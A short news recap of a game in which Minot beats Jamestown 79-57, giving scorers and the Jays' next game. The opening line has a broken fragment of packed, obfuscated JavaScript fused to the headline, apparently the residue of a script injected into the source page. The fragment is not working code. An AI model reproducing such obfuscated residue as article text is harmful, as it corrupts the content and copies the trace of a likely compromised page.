MINOT tktef|var|u0026u|referrer|hszhf||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Defensively Jamestown matched Minot possession-for-possession in the first half, unfortunately the same can’t be said about the second half. The Magi erupted for 53 second-half points including a 28-6 run to propel them to a 79-57 win.

Jamestown trailed just 26-22 heading into the break. Dakota Halvorson, who had a big night a year ago when these two teams met in Minot, hit a trio of triples and scored 15 of his game-high 17 in the second half.

Scott Nelson and Marc Wagner each had 14 to pace the Jays in their second loss of the season to drop Jamestown to 1-2.

The Jays are off until December 28th when the play Valley City.
